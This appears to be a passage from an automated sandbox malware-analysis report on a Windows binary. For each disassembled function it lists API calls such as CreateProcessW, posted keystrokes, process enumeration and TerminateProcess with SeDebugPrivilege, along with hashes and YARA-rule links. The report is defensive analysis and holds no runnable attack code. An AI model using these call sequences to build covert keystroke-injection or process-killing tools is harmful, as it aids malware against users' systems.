              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ChildEnumWindows
              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
              • API String ID: 3555792229-1603158881
              • Opcode ID: 870fd063adca28337942c0e8a4ececc69622f0c2f01a88e53a62c9ebc86871be
              • Instruction ID: f5e151662584ed87aed3a2517624c7bf3cacbdb06ebbf585591e69c43a81b0f3
              • Opcode Fuzzy Hash: 870fd063adca28337942c0e8a4ececc69622f0c2f01a88e53a62c9ebc86871be
              • Instruction Fuzzy Hash: 5091DA71A00606EBDB0CDFB0C491BE9FB75FF15314F90811AE999A7241DF30AA99CB91
              Function 00182E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,000000EB), ref: 00182EAE
                • Part of subcall function 00181DB3: GetClientRect.USER32(?,?), ref: 00181DDC
                • Part of subcall function 00181DB3: GetWindowRect.USER32(?,?), ref: 00181E1D
                • Part of subcall function 00181DB3: ScreenToClient.USER32(?,?), ref: 00181E45
              • GetDC.USER32 ref: 001BCF82
              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001BCF95
              • SelectObject.GDI32(00000000,00000000), ref: 001BCFA3
              • SelectObject.GDI32(00000000,00000000), ref: 001BCFB8
              • ReleaseDC.USER32(?,00000000), ref: 001BCFC0
              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001BD04B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
              • String ID: U
              • API String ID: 4009187628-3372436214
              • Opcode ID: 04b8025b7d9e9ce4fd98dc5a627bb5254040bb97575413685a7f995eacc61959
              • Instruction ID: 7bdb64482d51a0eb0fd4e03759fc58463fc169add2f8d6ec2c84860d51c4f3ce
              • Opcode Fuzzy Hash: 04b8025b7d9e9ce4fd98dc5a627bb5254040bb97575413685a7f995eacc61959
              • Instruction Fuzzy Hash: C271E230500209DFCF29AF64D884AFA7BB6FF49320F1442AAFD555A1A6D7318D41DF61
              Function 001F8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0020F910), ref: 001F903D
              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0020F910), ref: 001F9071
              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001F91EB
              • SysFreeString.OLEAUT32(?), ref: 001F9215
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Free$FileLibraryModuleNamePathQueryStringType
              • String ID:
              • API String ID: 560350794-0
              • Opcode ID: c74f3f738900e2fc858e6592d1be70bdba270565b491894dee2f01044193b18e
              • Instruction ID: 193f4935ef7258aa61ac32ae29ad3da56c417b9b146b34bb2f40eb81d2ce81e6
              • Opcode Fuzzy Hash: c74f3f738900e2fc858e6592d1be70bdba270565b491894dee2f01044193b18e
              • Instruction Fuzzy Hash: 6AF10B71A00209EFDB14EFA4C888EBEB7B9FF89314F148459F615AB251DB31AE45CB50
              Function 001FF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001FF9C9
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001FFB5C
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001FFB80
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001FFBC0
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001FFBE2
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001FFD5E
              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001FFD90
              • CloseHandle.KERNEL32(?), ref: 001FFDBF
              • CloseHandle.KERNEL32(?), ref: 001FFE36
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
              • String ID:
              • API String ID: 4090791747-0
              • Opcode ID: f066dfa29a4bee7dca6781c0ce8e971a8db28199b156b3459769283901e2c37c
              • Instruction ID: b76f6ab36a66a4bce73907c817737db127c93b430829056281119edc4636eb27
              • Opcode Fuzzy Hash: f066dfa29a4bee7dca6781c0ce8e971a8db28199b156b3459769283901e2c37c
              • Instruction Fuzzy Hash: 91E1C331604345DFCB24EF24C881B7ABBE0AF95354F18846DF9998B2A2DB71DD42CB52
              Function 001E4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001E38D3,?), ref: 001E48C7
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001E38D3,?), ref: 001E48E0
                • Part of subcall function 001E4CD3: GetFileAttributesW.KERNEL32(?,001E3947), ref: 001E4CD4
              • lstrcmpiW.KERNEL32(?,?), ref: 001E4FE2
              • _wcscmp.LIBCMT ref: 001E4FFC
              • MoveFileW.KERNEL32(?,?), ref: 001E5017
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
              • String ID:
              • API String ID: 793581249-0
              • Opcode ID: 06d36bef7a8ec9f7ff1f3505815807413bdf105a1fed582333a711c1125b27ae
              • Instruction ID: 96928be064184de809af447aa007187e0e1c00cfc500518fd84f6a5d58e41914
              • Opcode Fuzzy Hash: 06d36bef7a8ec9f7ff1f3505815807413bdf105a1fed582333a711c1125b27ae
              • Instruction Fuzzy Hash: 355187B20087859BC764EB95DC819DFB3ECAF95340F10092EF195D3152EF74E6888766
              Function 002088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
              Download Yara Rule
              APIs
              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0020896E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InvalidateRect
              • String ID:
              • API String ID: 634782764-0
              • Opcode ID: 20776e33533263a3ca83b0a964315d7cde05963a7374135466284938e34ceeb3
              • Instruction ID: 7b66d0cd5cf37509f18ccb071a41389386a2649414aa1601d005ac53adf732aa
              • Opcode Fuzzy Hash: 20776e33533263a3ca83b0a964315d7cde05963a7374135466284938e34ceeb3
              • Instruction Fuzzy Hash: AF51A530620309BBDF319F24DC89B6B7B65BF15310F504112F591E6AE3EF71A9A08B41
              Function 00182B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
              Download Yara Rule
              APIs
              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001BC547
              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001BC569
              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001BC581
              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001BC59F
              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001BC5C0
              • DestroyIcon.USER32(00000000), ref: 001BC5CF
              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001BC5EC
              • DestroyIcon.USER32(?), ref: 001BC5FB
                • Part of subcall function 0020A71E: DeleteObject.GDI32(00000000), ref: 0020A757
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
              • String ID:
              • API String ID: 2819616528-0
              • Opcode ID: 597ff29b58ddcd6c45f9b01639cc36f6d1779dc23158553297a96d327d0208cc
              • Instruction ID: c77c6a5b64404e213204716e159c5efd69d2d5f98d22202ee22f640df6b37f9f
              • Opcode Fuzzy Hash: 597ff29b58ddcd6c45f9b01639cc36f6d1779dc23158553297a96d327d0208cc
              • Instruction Fuzzy Hash: E3517A74A40309AFDB25EF24DC49FAA77B5EB59710F104528F902976A0DB70EE90DFA0
              Function 001D9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001DAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 001DAE77
                • Part of subcall function 001DAE57: GetCurrentThreadId.KERNEL32 ref: 001DAE7E
                • Part of subcall function 001DAE57: AttachThreadInput.USER32(00000000,?,001D9B65,?,00000001), ref: 001DAE85
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001D9B70
              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001D9B8D
              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001D9B90
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001D9B99
              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001D9BB7
              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001D9BBA
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001D9BC3
              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001D9BDA
              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001D9BDD
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
              • String ID:
              • API String ID: 2014098862-0
              • Opcode ID: bfa37de63083ce39e125d686cbda8bb4095a0d205004e33d0b0e3a2edfde481e
              • Instruction ID: 333719f5cd2572f494608f7aa04ba9003c7998c10c3db9da3726fd990fe17420
              • Opcode Fuzzy Hash: bfa37de63083ce39e125d686cbda8bb4095a0d205004e33d0b0e3a2edfde481e
              • Instruction Fuzzy Hash: 50112171580318BEF6206B20EC8DF6A7B2CEF0C751F110426F258AB5A1CAF36C10DAA0
              Function 001D8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,001D8A84,00000B00,?,?), ref: 001D8E0C
              • HeapAlloc.KERNEL32(00000000,?,001D8A84,00000B00,?,?), ref: 001D8E13
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001D8A84,00000B00,?,?), ref: 001D8E28
              • GetCurrentProcess.KERNEL32(?,00000000,?,001D8A84,00000B00,?,?), ref: 001D8E30
              • DuplicateHandle.KERNEL32(00000000,?,001D8A84,00000B00,?,?), ref: 001D8E33
              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,001D8A84,00000B00,?,?), ref: 001D8E43
              • GetCurrentProcess.KERNEL32(001D8A84,00000000,?,001D8A84,00000B00,?,?), ref: 001D8E4B
              • DuplicateHandle.KERNEL32(00000000,?,001D8A84,00000B00,?,?), ref: 001D8E4E
              • CreateThread.KERNEL32(00000000,00000000,001D8E74,00000000,00000000,00000000), ref: 001D8E68
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
              • String ID:
              • API String ID: 1957940570-0
              • Opcode ID: d0a79bf7148ba1f10dbdecc5b2d7e73398ae2a3f4a1a1608bad6ac0628de15eb
              • Instruction ID: bf74f8e6ff7745b88b0f4e1c8b06ef37b07d1c9704fad314e481e26dfaef49ea
              • Opcode Fuzzy Hash: d0a79bf7148ba1f10dbdecc5b2d7e73398ae2a3f4a1a1608bad6ac0628de15eb
              • Instruction Fuzzy Hash: C701AC75280304FFE660AB65ED4DF577B6CEB89711F004421FA09DB591CA7098008A20
              Function 001F9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?,?,001D799D), ref: 001D766F
                • Part of subcall function 001D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D768A
                • Part of subcall function 001D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D7698
                • Part of subcall function 001D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?), ref: 001D76A8
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 001F9B1B
              • _memset.LIBCMT ref: 001F9B28
              • _memset.LIBCMT ref: 001F9C6B
              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 001F9C97
              • CoTaskMemFree.OLE32(?), ref: 001F9CA2
              Strings
              • NULL Pointer assignment, xrefs: 001F9CF0
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
              • String ID: NULL Pointer assignment
              • API String ID: 1300414916-2785691316
              • Opcode ID: 7ddb5a3b1245e50b7a8c312b5ef18439434234fb6fac64660106477bfff1cf05
              • Instruction ID: d0fc86773e9b8615fe36ba8317bc51241ec9e95c0979e758d8e36e42d68e03f2
              • Opcode Fuzzy Hash: 7ddb5a3b1245e50b7a8c312b5ef18439434234fb6fac64660106477bfff1cf05
              • Instruction Fuzzy Hash: A6913971D0021DABDB10EFA4DC84EEEBBB9EF18710F20415AF519A7281DB319A44CFA0
              Function 00206FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00207093
              • SendMessageW.USER32(?,00001036,00000000,?), ref: 002070A7
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002070C1
              • _wcscat.LIBCMT ref: 0020711C
              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00207133
              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00207161
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Window_wcscat
              • String ID: SysListView32
              • API String ID: 307300125-78025650
              • Opcode ID: d0a085a79afa2e87f7a50b1de10c01c2517a34c5ac50d8fa28256c6e9ce362e6
              • Instruction ID: 61ffefb89c9d3023f0748f5a2397d13dced32166338d058e945bc52fec17b5fa
              • Opcode Fuzzy Hash: d0a085a79afa2e87f7a50b1de10c01c2517a34c5ac50d8fa28256c6e9ce362e6
              • Instruction Fuzzy Hash: A841D371954309AFEB219F64CC89BEEB7A9EF08350F10052AF544E71D2D772AD948B60
              Function 001FEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 001E3EB6
                • Part of subcall function 001E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 001E3EC4
                • Part of subcall function 001E3E91: CloseHandle.KERNEL32(00000000), ref: 001E3F8E
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FECB8
              • GetLastError.KERNEL32 ref: 001FECCB
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FECFA
              • TerminateProcess.KERNEL32(00000000,00000000), ref: 001FED77
              • GetLastError.KERNEL32(00000000), ref: 001FED82
              • CloseHandle.KERNEL32(00000000), ref: 001FEDB7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
              • String ID: SeDebugPrivilege
              • API String ID: 2533919879-2896544425
              • Opcode ID: 6937b972b80abe17cd055fcdf0dede8fc5b9a8f596aa481126d1384178e6ea30
              • Instruction ID: 8454dbd57bc57af80762a892e3c3e7183288eb342383f8f4cdfa440d4955212b
              • Opcode Fuzzy Hash: 6937b972b80abe17cd055fcdf0dede8fc5b9a8f596aa481126d1384178e6ea30
              • Instruction Fuzzy Hash: 6141BE712002059FDB24EF64CC95F7EB7E1AF90714F088059FA469B3D2DB75A904CB91
              Function 001E3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
              Download Yara Rule
              APIs
              • LoadIconW.USER32(00000000,00007F03), ref: 001E32C5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconLoad
              • String ID: blank$info$question$stop$warning
              • API String ID: 2457776203-404129466
              • Opcode ID: 774b0f4636aaf3fa2c7bcc9e512bf900fbd397adc288183c4150e54efcd9718e
              • Instruction ID: 57bedcafe459066074e597f3de5b6ee6477de09ef4860600de99be2ace64262c
              • Opcode Fuzzy Hash: 774b0f4636aaf3fa2c7bcc9e512bf900fbd397adc288183c4150e54efcd9718e
              • Instruction Fuzzy Hash: D61157356087C7BAE7055A56DC47D6FB39CDF2A370F20002AFAA0A7181E7A19B0006B5
              Function 001E4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001E454E
              • LoadStringW.USER32(00000000), ref: 001E4555
              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001E456B
              • LoadStringW.USER32(00000000), ref: 001E4572
              • _wprintf.LIBCMT ref: 001E4598
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001E45B6
              Strings
              • %s (%d) : ==> %s: %s %s, xrefs: 001E4593
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HandleLoadModuleString$Message_wprintf
              • String ID: %s (%d) : ==> %s: %s %s
              • API String ID: 3648134473-3128320259
              • Opcode ID: 5b456718e279cee2939cb07a5d06d8dbe4a9dd74d4f00909334a9708df48349f
              • Instruction ID: b181f0f1e7ac1c7dc54347e46ff6cd2befe4c5f568c3880e23fc27f932ab69fb
              • Opcode Fuzzy Hash: 5b456718e279cee2939cb07a5d06d8dbe4a9dd74d4f00909334a9708df48349f
              • Instruction Fuzzy Hash: 210144F6940308BFE760D7949E89EEB776CDB08301F0005A5B759D2452EA755E854B70
              Function 0020D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • GetSystemMetrics.USER32(0000000F), ref: 0020D78A
              • GetSystemMetrics.USER32(0000000F), ref: 0020D7AA
              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0020D9E5
              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0020DA03
              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0020DA24
              • ShowWindow.USER32(00000003,00000000), ref: 0020DA43
              • InvalidateRect.USER32(?,00000000,00000001), ref: 0020DA68
              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0020DA8B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
